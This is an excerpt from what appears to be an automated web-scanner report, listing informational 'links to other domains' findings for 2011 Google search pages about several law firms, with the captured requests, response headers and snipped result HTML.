<h3 class="r"><a href="http://www.milbank.com/careers/" class=l onmousedown="return clk(this.href,'','','','3','','0CDgQFjAC')">Careers at <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:npu69JnGsgYJ:www.milbank.com/careers/+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:npu69JnGsgYJ:www.milbank.com/careers/+Milbank+Tweed+Hadley+%26+McCloy&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CD0QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.milbank.com/en/Offices/" class=l onmousedown="return clk(this.href,'','','','4','','0CD8QFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:k9v21XP1N1oJ:www.milbank.com/en/Offices/+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:k9v21XP1N1oJ:www.milbank.com/en/Offices/+Milbank+Tweed+Hadley+%26+McCloy&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CEQQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Milbank,_Tweed,_Hadley_%26_McCloy" class=l onmousedown="return clk('http://en.wikipedia.org/wiki/Milbank,_Tweed,_Hadley_%26_McCloy','','','','5','','0CEcQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QDCUCfgNpqkJ:en.wikipedia.org/wiki/Milbank,_Tweed,_Hadley_%2526_McCloy+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:QDCUCfgNpqkJ:en.wikipedia.org/wiki/Milbank,_Tweed,_Hadley_%2526_McCloy+Milbank+Tweed+Hadley+%26+McCloy&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEwQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&amp;-McCloy-LLP?companyId=403" class=l onmousedown="return clk(this.href,'','','','6','','0CE4QFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:IH03gMzeM28J:www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-%26-McCloy-LLP%3FcompanyId%3D403+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:IH03gMzeM28J:www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-%26-McCloy-LLP%3FcompanyId%3D403+Milbank+Tweed+Hadley+%26+McCloy&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CFMQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/milbank-tweed-hadley-&amp;-mccloy-llp" class=l onmousedown="return clk(this.href,'','','','7','','0CFQQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mLMHqUO0jSIJ:www.linkedin.com/company/milbank-tweed-hadley-%26-mccloy-llp+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:mLMHqUO0jSIJ:www.linkedin.com/company/milbank-tweed-hadley-%26-mccloy-llp+Milbank+Tweed+Hadley+%26+McCloy&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CFkQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=688226" class=l onmousedown="return clk(this.href,'','','','8','','0CFoQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:DX_fBA8oE2MJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D688226+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:DX_fBA8oE2MJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D688226+Milbank+Tweed+Hadley+%26+McCloy&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CF8QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.legal500.com/firms/50677/offices/51159" class=l onmousedown="return clk(this.href,'','','','9','','0CGAQFjAI')">The Legal 500 &gt; <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4gJoSypKb-8J:www.legal500.com/firms/50677/offices/51159+Milbank+Tweed+Hadley+%26+McCloy&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:4gJoSypKb-8J:www.legal500.com/firms/50677/offices/51159+Milbank+Tweed+Hadley+%26+McCloy&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CGYQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.iflr1000.com/JurisdictionFirm/1593/130/Milbank-Tweed-Hadley--McCloy.html" class=l onmousedown="return clk(this.href,'','','','10','','0CGgQFjAJ')"><em>
...[SNIP]...
<div><a href="http://www.mofo.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CG8QoggwCg')">Morrison & Foerster</a>
...[SNIP]...
<div><a href="http://www.proskauer.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CHEQoggwCw')">Proskauer</a>
...[SNIP]...
<div><a href="http://www.morganlewis.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHMQoggwDA')">Morgan, Lewis & Bockius</a>
...[SNIP]...
<div><a href="http://www.skadden.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHUQoggwDQ')">Skadden</a>
...[SNIP]...
24.15. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=McCarter+English&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:08:28 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 73386

<!doctype html> <head> <title>McCarter English - Google Search</title> <script>window.google={kEI:"_AXMTbnSMuXl0QGKupzkBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,297
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=McCarter+English&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mccarter.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CCMQFjAA')">Welcome to <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:29jGdDa9czcJ:www.mccarter.com/+McCarter+English&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCgQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mccarter.com/new/homenew.aspx?searchlink=overviewnew" class=l onmousedown="return clk(this.href,'','','','2','','0CCoQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QLt_zQpX4pMJ:www.mccarter.com/new/homenew.aspx%3Fsearchlink%3Doverviewnew+McCarter+English&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:QLt_zQpX4pMJ:www.mccarter.com/new/homenew.aspx%3Fsearchlink%3Doverviewnew+McCarter+English&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CC8QIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&amp;show=1433" class=l onmousedown="return clk(this.href,'','','','3','','0CDAQFjAC')">Welcome to <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:HOVx-RVonIUJ:www.mccarter.com/new/homenew.aspx%3Fsearchlink%3Dshowlocationnew.aspx%26show%3D1433+McCarter+English&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:HOVx-RVonIUJ:www.mccarter.com/new/homenew.aspx%3Fsearchlink%3Dshowlocationnew.aspx%26show%3D1433+McCarter+English&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CDUQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&amp;show=1428" class=l onmousedown="return clk(this.href,'','','','4','','0CDcQFjAD')">New York, NY 10167 - Welcome to <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:u0PLB_vxqT4J:www.mccarter.com/new/homenew.aspx%3Fsearchlink%3Dshowlocationnew.aspx%26show%3D1428+McCarter+English&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:u0PLB_vxqT4J:www.mccarter.com/new/homenew.aspx%3Fsearchlink%3Dshowlocationnew.aspx%26show%3D1428+McCarter+English&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CDwQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/McCarter-English-LLP/law-firm-287476.htm" class=l onmousedown="return clk(this.href,'','','','5','','0CD8QFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nfWgB4OT7mEJ:www.martindale.com/McCarter-English-LLP/law-firm-287476.htm+McCarter+English&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/McCarter_%26_English" class=l onmousedown="return clk('http://en.wikipedia.org/wiki/McCarter_%26_English','','','','6','','0CEYQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6EYe1Zdh7P0J:en.wikipedia.org/wiki/McCarter_%2526_English+McCarter+English&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:6EYe1Zdh7P0J:en.wikipedia.org/wiki/McCarter_%2526_English+McCarter+English&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CEsQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://abovethelaw.com/mccarter-english/" class=l onmousedown="return clk(this.href,'','','','7','','0CE0QFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zP9KLpk9Lb8J:abovethelaw.com/mccarter-english/+McCarter+English&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFIQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://climatelawyers.com/post/2011/04/29/McCarter-Englishe28099s-Climate-Lawyers-Blog-Named-to-LexisNexise28099-2011-Top-50-Environmental-Law-Climate-Change-Blogs-List.aspx" class=l onmousedown="return clk(this.href,'','','','8','','0CFQQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:njIGb8bqhakJ:climatelawyers.com/post/2011/04/29/McCarter-Englishe28099s-Climate-Lawyers-Blog-Named-to-LexisNexise28099-2011-Top-50-Environmental-Law-Climate-Change-Blogs-List.aspx+McCarter+English&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CFkQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/mccarter-&amp;-english-llp" class=l onmousedown="return clk(this.href,'','','','9','','0CFoQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AjWoV2fTbaYJ:www.linkedin.com/company/mccarter-%26-english-llp+McCarter+English&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:AjWoV2fTbaYJ:www.linkedin.com/company/mccarter-%26-english-llp+McCarter+English&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CF8QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.abajournal.com/news/article/mccarter_english_raids_robinson_cole_of_7_new_lawyers/" class=l onmousedown="return clk(this.href,'','','','10','','0CGAQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:M4PtnK06jhsJ:www.abajournal.com/news/article/mccarter_english_raids_robinson_cole_of_7_new_lawyers/+McCarter+English&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGUQIDAJ')">Cached</a>
...[SNIP]...
24.16. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=baxter+hall+attorney&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=XFGT4lg_DpGj71fXNRI12T3QgI498DMCm4Vo9l4byW_QpzG-1W0BLR6-HJBfYe0g_Yd3khHZhnqBzpQ9o6NhmExBlmVDocZYG5FHVRmPESjfOu4RHg9_z7GWsQ3WRLNm

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:45:04 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 66366

<!doctype html> <head> <title>baxter hall attorney - Google Search</title> <script>window.google={kEI:"sCrMTZazJq2y0QH6-azzBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=baxter+hall+attorney&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://lawyers.justia.com/lawyer/richard-baxter-hall-299210" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')">Lawyer Richard <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:thURC4qBqhAJ:lawyers.justia.com/lawyer/richard-baxter-hall-299210+baxter+hall+attorney&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB8QIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.halllawpractice.com/about-us" class=l onmousedown="return clk(this.href,'','','','2','','0CCAQFjAB')">About Bill <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:XXrjahR5RwgJ:www.halllawpractice.com/about-us+baxter+hall+attorney&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCUQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawlink.com/nProfile.aspx?Id=252343" class=l onmousedown="return clk(this.href,'','','','3','','0CCcQFjAC')">Richard <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:JzUI4WovYW4J:www.lawlink.com/nProfile.aspx%3FId%3D252343+baxter+hall+attorney&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:JzUI4WovYW4J:www.lawlink.com/nProfile.aspx%3FId%3D252343+baxter+hall+attorney&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CCwQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/pub/bill-hall/1b/81b/995" class=l onmousedown="return clk(this.href,'','','','4','','0CC0QFjAD')">Bill <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:cm4wct92n7kJ:www.linkedin.com/pub/bill-hall/1b/81b/995+baxter+hall+attorney&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDIQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://uslawyersdb.com/attorney279284" class=l onmousedown="return clk(this.href,'','','','5','','0CDMQFjAE')">Ables, <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:-FvoOAjB7-EJ:uslawyersdb.com/attorney279284+baxter+hall+attorney&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDgQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mscivilrightsproject.com/content/371" class=l onmousedown="return clk(this.href,'','','','6','','0CDkQFjAF')">Integration of Ole Miss - Mississippi Civil Rights Project <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6j4_wJASvyYJ:www.mscivilrightsproject.com/content/371+baxter+hall+attorney&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CD4QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ci.baxter.mn.us/" class=l onmousedown="return clk(this.href,'','','','7','','0CD8QFjAG')">City of <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:7Qwdje4xsvkJ:www.ci.baxter.mn.us/+baxter+hall+attorney&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEQQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.orrick.com/lawyers/Bio.asp?ID=1201" class=l onmousedown="return clk(this.href,'','','','8','','0CEYQFjAH')">Ralph <em>
...[SNIP]...
<h3 class="r"><a href="http://www.baxtersprings.us/index.php?page=city-offices" class=l onmousedown="return clk(this.href,'','','','9','','0CEwQFjAI')">City of <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:oMyk1QaEu9YJ:www.baxtersprings.us/index.php%3Fpage%3Dcity-offices+baxter+hall+attorney&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:oMyk1QaEu9YJ:www.baxtersprings.us/index.php%3Fpage%3Dcity-offices+baxter+hall+attorney&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CFEQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.statelawyers.com/Lawyer/Profile.cfm/AttorneyID:64664" class=l onmousedown="return clk(this.href,'','','','10','','0CFMQFjAJ')">Bill G. <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rn2HM7x6M4cJ:www.statelawyers.com/Lawyer/Profile.cfm/AttorneyID:64664+baxter+hall+attorney&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CFgQIDAJ')">Cached</a>
...[SNIP]...
24.17. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Wendel+Rosen&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:01:55 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76335

<!doctype html> <head> <title>Wendel Rosen - Google Search</title> <script>window.google={kEI:"cwTMTcn8DoTw0gH_vK3SBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,29795,2
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Wendel+Rosen&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wendel.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBgQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:N-qqxQcSULMJ:www.wendel.com/+Wendel+Rosen&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB0QIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.wendel.com/index.cfm?fuseaction=people.searchFormResults" onmousedown="return clk(this.href,'','','','1','','0CB8QqwMoADAA')">People</a></div><div class=sld><a class=sla href="http://www.wendel.com/index.cfm?fuseaction=contactus.form" onmousedown="return clk(this.href,'','','','1','','0CCAQqwMoATAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.wendel.com/index.cfm?fuseaction=content.contentDetail&amp;id=8825" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoAjAA')">Offices</a></div><div class=sld><a class=sla href="http://www.wendel.com/index.cfm?fuseaction=people.staff" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoAzAA')">Staff</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.wendel.com/index.cfm?fuseaction=firmGroups.firmGroupDetail&amp;ID=3987" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoBDAA')">Employment</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.wendel.com/index.cfm?fuseaction=content.contentDetail&amp;id=8873" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoBTAA')">Practice Areas</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.wendel.com/index.cfm?fuseaction=firmGroups.firmGroupDetail&amp;ID=3989" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoBjAA')">Green Business</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.wendel.com/index.cfm?fuseaction=content.contentDetail&amp;id=8800" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoBzAA')">Firm History</a>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.wendel.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CCkQoAIwAQ')" title="Wendel Rosen Black &amp;amp; Dean Llp: Marquez Leonard" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 0;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.wendel.com/" class=l onmousedown="return clk(this.href,'','','','2','','0CCkQoAIwAQ')" title="Wendel Rosen Black &amp;amp; Dean Llp: Marquez Leonard"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.wendel.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CDAQoAIwAg')" title="Wendel, Rosen, Black &amp;amp; Dean LLP" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 -38px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.wendel.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CDAQoAIwAg')" title="Wendel, Rosen, Black &amp;amp; Dean LLP"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.wendel.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CDcQoAIwAw')" title="Wendel Rosen Black &amp;amp; Dean Llp: Mintzer Pamela" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 -76px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.wendel.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CDcQoAIwAw')" title="Wendel Rosen Black &amp;amp; Dean Llp: Mintzer Pamela"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.wendel.com/index.cfm?fuseaction=people.searchFormResults" class=l onmousedown="return clk(this.href,'','','','5','','0CEEQFjAE')">People - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:gHypnJ24_fgJ:www.wendel.com/index.cfm%3Ffuseaction%3Dpeople.searchFormResults+Wendel+Rosen&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:gHypnJ24_fgJ:www.wendel.com/index.cfm%3Ffuseaction%3Dpeople.searchFormResults+Wendel+Rosen&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEYQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wendel.com/index.cfm?fuseaction=contactus.form" class=l onmousedown="return clk(this.href,'','','','6','','0CEgQFjAF')">Contact Us - <em>
...[SNIP]...
